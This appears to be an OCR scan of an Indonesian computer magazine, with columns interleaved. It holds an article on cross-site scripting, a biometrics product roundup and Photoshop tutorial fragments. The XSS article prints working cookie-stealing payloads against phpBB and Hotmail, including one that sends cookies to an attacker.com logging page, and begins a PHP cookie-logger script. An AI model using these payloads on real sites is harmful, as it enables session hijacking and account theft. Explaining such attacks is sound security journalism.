ipt>alert(document.cookie);</script>&category_rows[0]
www.google.com dan pada address bar akan terlihat :
[cat_order]=99
http://by5fd.bay5.hotmail.msn.com/cgi-
http://www.target.com/phpbb208/faq.php?faq[0][0]=f00<
bin/compose?type=r&curmbox=foobar&a=foobar&msg=foobar
script>alert(document.cookie);</script>bar&faq[0][1]=
&start=foobar&len=foobar&curmbox=F000000001&a=foobar
waraxe
Cookies:
http://www.target.com/phpbb208/faq.php?mode=bbcode&fa
<!--><img q[0][0]=f00<script>alert(document.cookie);</script>ba
src="javascript:window.location='http://www.attacker. r&faq[0][1]=waraxe
com/log.php?email=victimsaddress@hotmail.com&cookie='
Vulnerabilities pada web aplikasi di Hotmail dan phpBB
+ document.cookie"><!-->
adalah sebagian dari bentuk kemampuan XSS menjadi
dalam hal ini cookie ditampung dengan menggunakan file alat dalam menembus securitas dari suatu sistem. Banyak
*.php dan berikut script php yang digunakan dapat dilihat di informasikan di Internet mengenai keampuhan XSS
pada Box 1. sebagai hal yang patut untuk diwaspadai.
Ini hanya satu bukti jika metode XSS makin berkembang Berikut beberapa info mengenai vulnerabilities web
dan banyak sebenarnya informasi mengenai system yang aplikasi terhadap XSS:
vulnerable terhadap serangnya yang menggunakan metode
XSS dan itu dapat anda jumpai di situs-situs underground. XSS Vulnerability in Phpgroupware
Juli 4 2003
Bagi yang berminat mengenal bagaimana secara teknis
kejadiannya situs KPU dapat di-hack menggunakan XSS msn.com XSS vulnerability
vulnerability dikombinasikan dengan SQL injection, dapat May 13 2003
melihat laporan detikcom yang dapat diakses lewat berbagai XSS Vulnerability in NOKIA Official Website
situs, seperti misalnya di sini: Jan 20 2003
http://students.stttelkom.ac.id/news/?op=view&id=105 XSS Vulnerability Found in Apple Web Site
http://www.bhinneka.com/Independent/Thepost/postScript/ Jan 5 2003
?nid=PN00000561 XSS Vulnerability Found in Cisco Website
Bukti lainnya mengenai keampuhan XSS dalam mengeks- Dec 18 2002
ploitasi kelemahan akan sistem aplikasi web terjadi pada
BOX 1.
<?php
$file="youpasswordlog.log";
if (isset($HTTP_GET_VARS["cookie"]) && isset($HTTP_GET_VARS["email"]){
$logcookie = $HTTP_GET_VARS["cookie"];
$logcookie = rawurldecode($logcookie); //turns url encoding to normal text
$logemail = $HTTP_GET_VARS["email"];
$logemail = rawurldecode($logemail); //turns url encoding to normal text
BIOMETRICS IT PRODUCTS
K ETIKA ADA KEBUTUHAN MENGENAI KEAMANAN, MUNCUL
tawaran sistem pengamanan dengan menggunakan
Berkaitan dengan teknologi biometrics untuk tujuan sis-
autentifikasi PIN (Personal Identified Number) dan pass- tem pengamanan, saat ini sudah lumayan ramai hadir
word. PIN bukanlah hal yang baru; anda sebagai peme-
produk-produk yang berhubungan dengan komputer di-
gang kartu ATM mungkin selalu berkutat dengan hal itu. lengkapi dengan teknologi biometrics. Pada umumnya
Begitu juga password yang merupakan otentifikasi yang
teknologi biometrics yang digunakan masih berkutat pada
digunakan seperti pada mail account. fingerprint (sidik jari).
Seiring dengan kemajuan jaman, sebagaimana yang kita
ketahui, tingkat kriminalitas juga menuju era kemajuan Flash Drive
sehingga dirasakan tawaran sistem keamanan dengan Sony. Perusahaan yang dikenal inovatif dengan hasil cip-
menggunakan PIN dan password tidak lagi mampu mem- taannya yang sering me -
berikan rasa nyaman. Muncul tantangan baru untuk men- ngejutkan, ikut ambil ba-
jawab keresahan itu. gian untuk pengembang-
an flash drive yang di-
lengkapi dengan teknologi
Biometric dan diberi nama
Sony Puppy.
Ritech International. Per-
usahaan yang bermarkas di
Hong Kong ini mungkin ti-
dak terlalu berkibar nama-
nya di Indonesia tetapi per-
usahaan ini juga menge-
luarkan produk flash drive
yang diberi nama BioSlimDisk
dengan sensor yang digu-
nakan merupakan teknologi yang dimiliki dan dikembang-
kan oleh Sony.
BioMetric features
Trek. Seperti juga Ritech Interna-
BIOMETRIC tional, Flash Drive yang diproduksi
oleh Trek juga menggunakan sen-
Biometrics hadir sor teknologi milik Sony. flash dri-
dan menjadi pi- ve yang dikeluarkan diberi nama
lihan tetapi bio- thumbdrive.
metrics masih te-
rus dalam pe- KeyBoard
ngembangan dan
masih memiliki Yang selalu tidak
nilai materi yang ingin tertinggal da-
sangat tinggi, lam persaingan tek-
walaupun begitu nologi canggih ada-
masih tetap men- lah Microsoft dari
janjikan sistem group hardware yang
pengamanan yang diketuai oleh Tom
terbaik. Gibbons (General
Manager dari Micro-
BioMetric adalah metode otomatisasi yang mengizinkan soft's hardware
otorisasi kepada seseorang untuk account tertentu dengan group) mengeluar-
berdasarkan karakteristik biologis dan tingkah laku, seperti: kan produk berupa
wajah, sidik jari, tangan, tanda tangan, iris, retina, suara, keyboard yang di-
dan lain-lain. Semuanya bertujuan untuk mendapatkan lengkapi dengan teknologi biometrics. berapa kira-kira
sistem pengamanan tingkat tinggi dan teknologi verifikasi harga yang ditetapkan oleh Microsoft untuk produknya
personal. yang satu ini?
Jika anda penggemar film fiksi action produksi Hollywood, Tidak hanya produk-produk yang disebutkan di atas yang
sering diperlihatkan gambaran teknologi tingkat tinggi dikembangkan dengan teknologi biometrics, masih banyak
dengan sistem pengamanan yang digunakan berdasarkan produk lainnya seperti mouse, notebook, cellphone/PDA,
sidik jari atau retina mata. handbag, dan lain-lain.
Apakah biometrics ini diilhami dari film-film tersebut Yang pasti akan tetap terus merambah, mungkin ke per-
atau malah sebaliknya? Informasi mendalam mengenai alatan rumah tangga nantinya akan dilengkapi dengan
biometrics dapat anda temukan di teknologi biometrics. NeoTek akan membahas biometrics
http://www.biometrics.org atau http://perso.wanadoo.fr lebih jauh di edisi-edisi mendatang.
PHOTOSHOP P
ADA PEMBAHASAN SEBELUMNYA SUDAH
membahas beberapa cara memberi
efek pada image.
Nah... pada kesempatan pada edisi ini akan
PHOTOSHOP M
ASIH MENGENAI TEKNIK MENGGABUNG -
kan beberapa image menjadi ke-
satuan image.
Berikut ini merupakan teknik yang lebih
PHOTOSHOP U
NTUK BAHASAN KALI INI MERUPAKAN
ekstra triks untuk menciptakan
image yang benar-benar memiliki
nilai seni sehingga photo anda menjadi
Penerapan Adobe Photoshop untuk menciptakan image yang memiliki karya seni.
PATTERN 1 PATTERN 2
13 Setelah proses menambahkan
image lainnya. Selanjutnya adalah
14 Langkah terakhir yaitu memberi-
kan pattern diluar bagian wajah,
memberikan efek Pattern jadi ketika pattern 2 di tambah-
(Edit>Fill). Efek Pattern ditujukan kan maka bagian wajah yang ti-
pada wajah, oleh karena itu bagian dak diharapkan memiliki efek
lainnya harus dibersihkan dengan pattern 2 harus dibersihkan de -
menggunakan Eraser Tool. ngan menggunakan Eraser tool.
Jreng!!! project anda selesai dan
selamat menikmati.